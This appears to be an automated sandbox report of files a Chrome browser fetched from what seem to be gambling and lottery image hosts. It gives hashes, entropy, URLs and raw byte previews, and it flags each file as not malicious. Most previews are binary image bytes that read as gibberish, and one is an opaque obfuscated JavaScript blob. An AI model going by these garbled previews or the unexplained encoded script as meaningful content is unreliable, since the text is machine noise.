                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:...........\Ko#..>{...Z.yrf...#>.8...a.$EK..i(i.E.{._U_...En..,.S.]......>|..f..~.....|.<].}?.1..l...a?..o~.S...;G^5.._.e$O....n.[m."Q[...o....t...._........-.6{_]=>^..?.>|..^.v..i...{.~.Oo..%.........~.gxv~../......~.5.{X.....a}}..ow.-o.............!n.:...).o......)....%..v.....y.......zwXo...........`..........Q..y..]/n....9.o.....^.+......^...?.C2.......z...Fvq.[........by<...1..l..........w....`.bNB~.../...q...).||.'....~<.....=..e.....t..F|.\p..?}z}..6O./.f..<../Cx..7.q.z......M.1z......qI..'.....~x@.o.c.....?=.7...r......[P.L..^.O...t8<.>.8.8..7....j.tA6..../.....YgM...b...~.r....F.n_............o._...........xs.~.........;..........O.%8|...=.....(..q.4n.O.g.Y_.u[.....w.,eI.~wXm.6./[...}..nYV....1..K7.".6.k.?....<.....w.........f.....X.-.]4.(.[^...q.w....;.9.}^w..=.=?..>......_.......[.N...v..K....?..j..UU.....p..|ju>..RA..u1.].l?....).wv.~.z*...uQU..m.B.N.3m4#.(..L...T...!.UeU.^.K.x.........r~.w*+'o../...y ..Ne.....Ds.jL
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):16228
                                                                                                                                                          Entropy (8bit):5.053983434030325
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:g9UztP6/SOOmz6C5ckwgaCPrXfiAbwJuKejbMFo/z95N0Db23//70Lonier:g9UU/fOmzwCTX+er
                                                                                                                                                          MD5:1AD1EE321134B2A6630D60F75DF1F7A2
                                                                                                                                                          SHA1:5E64551B37AD207037A884091FA66EBE8183AC2E
                                                                                                                                                          SHA-256:E93D060958E7643D5005229C5BBA7AD7B4E40E8C912B06609876729871C4E42E
                                                                                                                                                          SHA-512:9C1178DB50353F24E7B551ED98D016AFE15372C7F841BC0C3F268C67E04592372AA6BC55FED7AEE624F25BEF24446A0205ACAEDC8A0964E81B9EA2AC23D4E869
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://stt-wasm.ai4funs.com/wasm_exec.js
                                                                                                                                                          Preview:// Copyright 2018 The Go Authors. All rights reserved..// Use of this source code is governed by a BSD-style.// license that can be found in the LICENSE file..//.// This file has been modified for use by the TinyGo compiler...(() => {..// Map multiple JavaScript environments to a single common API,..// preferring web standards over Node.js API...//..// Environments considered:..// - Browsers..// - Node.js..// - Electron..// - Parcel...if (typeof global !== "undefined") {...// global already exists..} else if (typeof window !== "undefined") {...window.global = window;..} else if (typeof self !== "undefined") {...self.global = self;..} else {...throw new Error("cannot export Go (neither global, window nor self is defined)");..}...if (!global.require && typeof require !== "undefined") {...global.require = require;..}...if (!global.fs && global.require) {...global.fs = require("fs");..}...const enosys = () => {...const err = new Error("not implemented");...err.code = "ENOSYS";...return err
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1977
                                                                                                                                                          Entropy (8bit):7.248014256640445
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:dfinNuiqy8N8J3J6b45teX7oyUVWLffIQ:ANIu6b4zeXkyUELf
                                                                                                                                                          MD5:BF861ED8EA02C882107B63B4ABF2E536
                                                                                                                                                          SHA1:596C381475565D7708924FCFB9E47EFEB69FBCC3
                                                                                                                                                          SHA-256:EDEC280C48B8A62E52D6AEB17230A6A1C98F171A101013CA4CE1324BC63C9552
                                                                                                                                                          SHA-512:85475E6C590E5A76DB1C78051DDFF1AD49F299A8BA6C012A61E096D70A6777C26F745196C54FC71E7F55A2AE500C1048523DB6BFAC77632E93293EEE686BBC24
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/sport_im_w.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:17BBB51BCE49E711A809823CCFAF5CCB" xmpMM:DocumentID="xmp.did:8E344AEE90D811EABF468BBD79C334E0" xmpMM:InstanceID="xmp.iid:8E344AED90D811EABF468BBD79C334E0" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6d813f3c-493d-9f4f-8816-a7a1b06c4e05" stRef:documentID="adobe:docid:photoshop:2c773ef6-6c86-11e8-ac1e-9eb171772df1"/> </rdf:Descri
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 90 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4559
                                                                                                                                                          Entropy (8bit):7.827106635894467
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:CYzFTu2heep4YiLjLEakvXcg1gss5/1cyk59lGWpgFrimmKilbXCDDd:zw73vkv9gt5/yyGcUgFrimmKdd
                                                                                                                                                          MD5:B086C524DDE5F4979489F6A64E0B083C
                                                                                                                                                          SHA1:2BBC83084C9CEBFD37AAD47C5B65C12D5C671CFA
                                                                                                                                                          SHA-256:ABF134961C24281B03DF0BCBD87E497F81F727D3AF64EABEFC81261F978B876C
                                                                                                                                                          SHA-512:3D41230324900CC69468126AC240FD74BC45FE43794F53F4D94744608CAE199ED3B047728A16F44667CE67F96775065FD36B690AC4ACB710F8C4358343DEBBCB
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...Z...<........E....tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8" xmpMM:DocumentID="xmp.did:070664E1F77811E8AE71AEF0D532570E" xmpMM:InstanceID="xmp.iid:070664E0F77811E8AE71AEF0D532570E" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:c5537c56-d66b-9f4a-95f4-82eac84c99bc" stRef:documentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.|.W....IDATx..[ytT....6[f&!!.kY....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 26, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1954
                                                                                                                                                          Entropy (8bit):7.417947450666081
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:nzo7FDNn2DdOJJ3tCTkIUXggIOZNTrWUdXgxAJ6:zo7F52oCKbzZNTrDky6
                                                                                                                                                          MD5:6B2665EF458F844A9730AED043009E55
                                                                                                                                                          SHA1:B8D449F85E04453AF5BC0C17F0319E0353117C42
                                                                                                                                                          SHA-256:8554074404315773C29A56F0709068144381195CB704C67102645CDFD1E688D6
                                                                                                                                                          SHA-512:45A30E176E3C1038D29B8669376B90DF66342C4D0451B0D9B214710AEC320AF112D3670F81622550BE13B9D901A939FE0A7A5B12A412283766719D739C848891
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/index/121/nav/chessico.png
                                                                                                                                                          Preview:.PNG........IHDR............./.{.....tEXtSoftware.Adobe ImageReadyq.e<...!iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:A730D25FA6D711E990EFC94F38CB495A" xmpMM:DocumentID="xmp.did:A730D260A6D711E990EFC94F38CB495A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A730D25DA6D711E990EFC94F38CB495A" stRef:documentID="xmp.did:A730D25EA6D711E990EFC94F38CB495A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>[..Y....IDATx.b...g..`b.. .hu..EiN #.W..A..-.<<<.U...+M,S..a.~....."..B._.x......x...)?Z.0F........._L...oy..*...t
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):24
                                                                                                                                                          Entropy (8bit):4.1887218755408675
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:uuKln:uu4n
                                                                                                                                                          MD5:356555E64410CB07748C013C7862421C
                                                                                                                                                          SHA1:9FC2E0D7B2297CAB2DD4824D42BB20AF8CE1B6FE
                                                                                                                                                          SHA-256:9BF353A4E2B515DA809F62D31F61F5FD659AB8FFA04E1AC7A3304F2B05510748
                                                                                                                                                          SHA-512:0A14AE03555EBA744339B7632B8F5D382F60232499BC4D773D88DBDB7E3FAEAB7CC2815477EF59A68D500E648F977ECB68EA03D9DC9CB88FAD7201F2876D9A7C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:....(empty-777).
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 80 x 80, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4625
                                                                                                                                                          Entropy (8bit):7.9479129975388165
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:hhofsY4tB5xAQbGDvutqlhKhnulFQ/DUkmyIs8OIF0ITuS:Qf4tB5mQbmvsOAsa/D3VPY0IL
                                                                                                                                                          MD5:9BEE125647B10E926174FDF6C7497DDF
                                                                                                                                                          SHA1:502D58F0EF8B4D51F87D38FF6B38EEB4F7C340FE
                                                                                                                                                          SHA-256:B539ABBE5B071C6B5804374F88E6B2FACAFA9653AB8C19919CF30E1EA049650C
                                                                                                                                                          SHA-512:36782B06148C8EA35CE718C3631E17FADAAA4305F2025BDF175F714718BE4D861F6C75CFB2B7A988E1DA65404F3190B661B0B5491D2E4C4A611B1D5AA23E2C1E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/lotto/lottery_1502.png
                                                                                                                                                          Preview:.PNG........IHDR...P...P.............PLTE...}..W....E..K..Q..=..E...w.3..7..6..%y.H...t./..C..&}.-~.7..;....W..)|.s..*.....}.....4..A..c..#s.L......n.e..$u....e.. r.:...j..F....s.../y..`..X.....M..L.F..D..0v.T...^..........@..n..<~..c.,{.D...P.5}.(u..f..f....C..X..(..;..'x.._..@.i.....p..B...X..Q..Q..V..J.B..B..h..k..&z..[..W....I..?..>..>...c..e.e...Z....Q..M..9..$r..N..<....p...o..T..M..H..F..C.Z..+..^..2..&q..k.....S._........^.9x..^..T..+vT.._..,..j..,..$}..q..f..5.....f..i..m....K..@..._.._..A....a..V....>..2...g..(o...\..M..<...;.......<...2..G..2...k.......w..I.....o..g..H.....R..2.....o......../k..v.J..B.......A|.1q..w..h.......@..?..9...u..3..3{..........${..i.(X.;..&..(g.:..S......O...#a./d.+..`.....R..{..Cs..@.......8..........(........pBv.<i.+B].=.z.5.r7.pI.S..%......I...#tRNS.....x.........UR..U..zvaT..^&....;....IDATX...k.p.......I..i.K..S.;n.=;Us2..B...[F..e%-y.tH.b.*.X`v.B...d.Ta..DOB/.?...n.b_........q.."..o)...|a.$0..LG.A..xD...q..E...........
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1092 x 720, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):103738
                                                                                                                                                          Entropy (8bit):7.953096936376712
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:2OUm/OAsVxwc2a+N92Nvxm4YxsmhzsKnJkmlP8MoSG+cGm3rZMM8a8QjtUotUTga:2CpU7m7OEnq80d5ZCQjtB92Jq38Tzl
                                                                                                                                                          MD5:FE21BC54B27A9F17051B8B20272B84ED
                                                                                                                                                          SHA1:B8F46EFF9DB9C7DDA22E84C6068217F5E5CFC19C
                                                                                                                                                          SHA-256:92BFAD1534C35E59192341700DD98B1FA3783085842A4E56F1EF6EF7C52B15A1
                                                                                                                                                          SHA-512:FD9183A940A4115C4937786CAE5AF64C115FC70537C46B58DF7001241DD3C9A4DE2101167A8055032EA132CF8A2ED0CE79AF5A3D275F975A4CE5B1518E430CE4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...D............L....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.......{.s..<.4.(. .. $c!l!. ...w.......g...2...}.........8..e.o..$c...D.B(..&......W]SS...'u..v}f...v..r.9.{.R2.d..........z............z............t..T.I.T..H...&.C>..h.K..A.9..6.0.........*.........Ur[E.$.6...Q..T].T........-.m[.O.....c..(.<.l....].J(.....'K.!. ....... .Q....*..`.......5R...L;S4..g....G.......h.DDf.U..E..K...P.v.X....gTIDq.... .V...b.._>|.F....f.K..4....".U....T....~.....G..{Fn.,..w........1Z>.Z..X.9#... F..T...........z.I....-..l.M...B.V...8.L..kH.......m.0....s4.V.......K........e4....Sf.q.2S..A!P...Q. .%..@...?h.D.N.p.2'..oz,.... {...C...>.L..dLf.g......t..<S...../....b1..>Sw&...#_.+..5..$.....Y(.J.p8.x0.K>!....$....1...Cq>.."u.......*Xzr...3d......L1....e.k:..T."Q<:..r..,...B..X..e.. "..G.X.2.`0.W..m.....j...?....~Z.H..y../.....3........Z.?.V.....^}..%K.O..?.c.M_.RWuUU"..*B.C........g.......=T.hMp.eS.Wf..A.Q.........{...<.{L.......9.U%p.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 325 x 556, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):114423
                                                                                                                                                          Entropy (8bit):7.9916455761961815
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:3072:jYVA4/f7Ih0qCUMRwY75UovYUDUVF+/cHUNHEDX:jYO4/0CBZR3OiYZ+/cHUNQ
                                                                                                                                                          MD5:3BE4029A6AA704B98A3F92630FDD0103
                                                                                                                                                          SHA1:DDE5B69CEC9838E8058895BB58D653762D80130C
                                                                                                                                                          SHA-256:0E06A1B67596C4891D37915041CB10C2F499FB4D95D8B56CFB1464B38DB11684
                                                                                                                                                          SHA-512:F43720C6A9CF2CFAC54248AAE778216F96126665AED003B6E166407B6B23173246348580DE96BE48DA229CC48CD7E6F6F0D5318E48A98CDB490EAC7BB36290C6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/app/04.png
                                                                                                                                                          Preview:.PNG........IHDR...E...,.....eg.R.. .IDATx^.....y&.U.8y0.a.#...AB`0.(..^....d.Z.w%K^Yk.{..Y..>......l..L.D.HK. .."A.9.09w............BsI.....u...~....6..p.'.J.Z4Mk....&..L.\d.f;...1IRT.q.r.....%..]....d.U..x.S<..uv.wK3..m......-Ug.q2...IJ.."..eY9.....:Y__?.=`.c.dU..:...-x...,...#.e.-.m..UU.MLL.%I.F..=R.e..(.TU.c.#..e.-...4SPtf.*...,Me.ng6.Js...........&.qr.....vJ...1pp...{..^.43s.Xb...O.R[%I.P,.{W2.$P.l....`F.x-@.qE.9P|'..b....8...(. ^..i.%K...4.(......b..;a.j..W..1:....~A.._.$.....7h.&s.A0...a...4....8.9P.m..8....Z_.......J(...@.i;.EEQ^V5......X!]...s....H./_..7.V...eY...'.. E".<..Ev....1.O.......Y-.'.......... g.S..<..q=.SS.....u..CP.... 0.$..\....(.e.O.......SG.[._Os...............m..#N.[\.#d.s.y\a...$..:;...u.34....T1\H..t...6.x.....z"...Zp^.}C...8....FB..4M{..l..;.I.u.s....K..hk...i..H..ud,._..p.!.,..vO=..qV..u9`gA.b.-..#y....w.C.N.....{.`C....5.C.........2.A......F?x.=...C.=.........6.^.N.n..KP....hji..a._....+.4.-.A.MR.x....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 68 x 79, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8202
                                                                                                                                                          Entropy (8bit):7.943926398746772
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:QdAJE521VSL4i+TGRgH6rZxyPsVuL8oxmM9AtJ2HdyxMQk1+Ay:ev5Ws4lGaH6NgCjmmM9AtFMQk0Ay
                                                                                                                                                          MD5:54F3E573C7AF59DF24542128AEEB6984
                                                                                                                                                          SHA1:8C9F023E395926BBDB6F5A0AEF83ACD8FA14155E
                                                                                                                                                          SHA-256:3D561FC6FACA37123D78035388B4B3C6543716686901C85496AB490EC2A5350B
                                                                                                                                                          SHA-512:419FB5A6E3179767F5DDA9441031A4FF5BC72B974A694856BB6B2422D1FC3D527D5E4BCA81958326C4AA7614C9BC2FC5F72CA7189DCD852611885FF45F61998F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...D...O.....R.cq....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.............!IDATx..|y.\U....g....2..A........."..2......"8...{}.8...<@. .yPF....U@e..L.......3....TUw......oS..T...[k...}.........r..`..i..#.Z..)8.....<EM.. ..Q...-=.L!1J.P.i.(CY^.wR.#%R...*................#...P........@<..........a...1.(....+...q.N..3o.-Z...Vf.V..\e.v....`.9....)..m.'......`.. ..&#V.Y.<.H~g../..e.]...... ..9`..tt.L.t.....B..g..A.D.\......'6.6<:...Y.m.s...+4..B...V..`Y. ....U..$...*...P.-..b+k.....".j.K.9.#..$........8.F..;.tGe ,.S7...N.j.. .r.e......,.b..C...4*M..b@X.!7..6.d].0<....3*..pd..4M..@.....?W...SGV.~......y....[:o..u. ....*>w..E.Ly...Lg.N.R..l.......L.t...M....c...@y........D..3.]a....S7.V.w[..M.{FI.}(...".#.....<....... .e.~.v.....(.1!.....}O.x.p.E....^......%..6k?.m...c.ZH]!M...p9.....@-...<..@P...pM..|....z.>..8Ppp......>....6o.:.....D....3..i#$D:WQ/N..6.l1{.*.9I.[)g.Y}...)...W.z.J.j.........W......,..0@....kq...H.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):17920
                                                                                                                                                          Entropy (8bit):7.954260425598395
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:6Xhq0luXIA7ppy5ZlQfVOgMGRWjji7v2FDzBKV9NVZuYGVhrfracy6HZyyaVnUgG:6E0WppU5ZlQfVbIa7v2DW6VrfrkyMn1G
                                                                                                                                                          MD5:9BEEFE094C5746596EB886A0F9CE9516
                                                                                                                                                          SHA1:043A5F197A8B4A8CC3B40A3126F1BFB8CBD12ADA
                                                                                                                                                          SHA-256:39A8BDC4F2DB24410A4A0D4180FF953D1AEC6EFDD7DBAC23A37D08C813214151
                                                                                                                                                          SHA-512:1F41A044818844CD6E734291116E0CAE1E5D93A7659823084103CC3ED3D862EDA115E2B44BA8F5809D0CDE91C9BB7EDCAD75403B196A1D5738105CACD2C6A831
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/lebo_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:E2893C229C1511E79144CCF7D3AEA9BF" xmpMM:InstanceID="xmp.iid:E2893C219C1511E79144CCF7D3AEA9BF" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1fa39400-0423-3b49-88e9-b820ab33a34b" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):140
                                                                                                                                                          Entropy (8bit):5.3256535880866425
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtLdlUmuL1//K0/jp:6v/lhPKM4nDspLfUP5jp
                                                                                                                                                          MD5:1841443641AF694C6515E15166B04B68
                                                                                                                                                          SHA1:58AD8383DDB30D9E9C27A563712B3F0747920384
                                                                                                                                                          SHA-256:B8F06A19EF29E66C792C9C2828A5A49206B70759B20492C1B827300DE8228B1C
                                                                                                                                                          SHA-512:C2CA036FD9C9DEED8255D516A6007BF68BB7A1C04BE59A2B7162DC343117A1B1773A593F81BA012F828A7381735B5AC4F4EF0583D449C4BDBE9B079FEE2D165C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...1......i..3..$`...................0.@..=..gI....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (16684), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):16684
                                                                                                                                                          Entropy (8bit):5.953441443468072
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:VMvOy/xYKnMORAqY1XfH3QrCgfPOgweBQIhU1aLK7ajaHBXgL:ymy5J1UXfX8CSjDe1AmajahXu
                                                                                                                                                          MD5:BDD9C950F5DFCDD698DBD71D987CE0A5
                                                                                                                                                          SHA1:E797D717C4FC493163752B81101B13CD4F489DF3
                                                                                                                                                          SHA-256:3C0C4B10F7AA7967DF22F40523183DA75A93EF62D210653D1A67FB6582EF1E1C
                                                                                                                                                          SHA-512:C47C7E6AA3A676C942D40A46EAF9CCA513AFD458CEA009F701D32CCCDD3DC617FB834C123629ABCF2223E4496F177EDBA8AB5BDBB285B320D07B1782FF0904EF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/382/views/home/indexContent.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAHAFgDYBdAGgG8BBACwAUAZALgDMBXNGAFwEt1NPSIAJTkAvqQBKASTQBVFuy680/QaTQiAblABOAAm4BubgF42HHnxE6QnVjrR7zSvpxHPLjkJm4juzTDRsbmIhGzsHPSCQgDoQAA8IFB1OJENtfSgTaOITcgSklKRGMVJuABNGblIAGxQocpBKgEIARlFDcPtHTmDiGJgoGprMKDjE5NTSKGnxwqnhWbqGppNmgAZZgsmkUQyovI6uyJAYgFsTAVOYbMEYiBMAInLuJE4AekfBTHWhURwPMpVCB1CJHqwkCA9G8dNwuI9DID0AZ+NZbN09JwAGRYzgxAD6+JASAAsihyqwaiAAPycEqNZhQSl0ziiPa6PRZADyYAAViAuDEoEgkNwAOZoAA+kqRKjc5GYyUw+xAJlahhAAB5dGLWGcQGhUjEqWgxZxqBqANSWrQctAmHV6g2pbAgYiIpX7bgGRwaHn8wUQHQoTghgCeEFO1GFXOAaFowcjKTDAyGIzQZSEOP4fWyfT+xx64hQJm4mB8gUwrSEQnUmEINdrOlLlYA7DXSEgWypcB2bmWVABODusbtV361mpj1rV2vlaf4DvMEzYMgXNqkTR5FDMZiQumtABMm0aNSgYcYmxAwu4psYj2vkK+FJ0UE8jHw6xPrygYCpjA3dAYBAADWk7ThdE4ABRTRnXvAARLkSQAYXQThnXoepGnKL5zWDThOCpeCQDPC9B0HUhGjAFBFBAYjSMYABWb8kF/KkSVYCDPB5SEdFgnRQPEB5ZUwPwAkdfVDSQY0DTNagAD51hxTQUAqPR1maEwHR0XVJJddZiBxCTnSQbADOzddflIM4wnRSJlx+WoYgZJkajcTBmE3WtHNYZyQEZZkhA8zcYiAxZmHEMUzEUTxRIVExHPKPyArcoLaywP5DDxbYijyW9uDpET5S3KBlVINxSAck9ktc9yhHSDlV
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 4964 x 72, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):74604
                                                                                                                                                          Entropy (8bit):7.982916247536255
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:Rnrw0YzEnf0NkLuvzHDU7/gZ2GRN1ZEl7Dqxj4L1xD4o3RjMxgAXY1hqp/ubLmf:THFmbDU7ITRlE5WG1xcIjWRlxubLo
                                                                                                                                                          MD5:20750D3161559951729E005CF988BB1F
                                                                                                                                                          SHA1:67AC93184C3259C55EA7E26D6F8716525946223A
                                                                                                                                                          SHA-256:56AF3A9FBC08041521E9F381949BFC2E9548B013798BAC0B2D629AB3939D8913
                                                                                                                                                          SHA-512:9723A636F7E28D32DF6AEE4BAD9D6BE26DEB24B3AC29AA5FDDFD74C6253A589BEDE1295B384C5321CCD96D3F9549507DD76E78E9B7790C17587548BED3E85935
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...d...H......F......PLTEGpL......+......................................................................................=.s..............................L:4.........d8..../*....#)........4...T(u\>.8L........[G.+...b+.a/....*&..%.&+.5..%_..B.%'..'.$%.vH.k).U......%@..;"..~=..`.v$.e.)&.....-.X.$.<..#uqi.'E..h...z..|ZZQ..U2..).z.?..'&fVH..i.......%\..tM%.Q.."#..n0..*...6.M...:=...+.......;.....Y[..>0....;.....^.P.!.....F.P.G........Z.......GxV.N..g..Y..b+...HCU...'..O.@... .u.z..}.....~.;.h. .<.4.................)...._#../.! ....."..UR...&'..d.f....C6"....!....!..2....|-............&1.G..]..#..x.n...&.Y=..... .....F....@..D(('......^ .{..V.|-...........Q..D..m,dY.c.-H;E.2..o.....Ef,..c.....".cb..&.................&+......h...M....^.....U..2...y....3F....tRNS.....:.C....+.#.e..2\....OV.kz.q...........7...#u>.~J..T\....d.u.....C.... ...Y.....wK.._...............G.......................jy..d?.n.... .....E7&........(Y...........
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):25956
                                                                                                                                                          Entropy (8bit):7.970174820456842
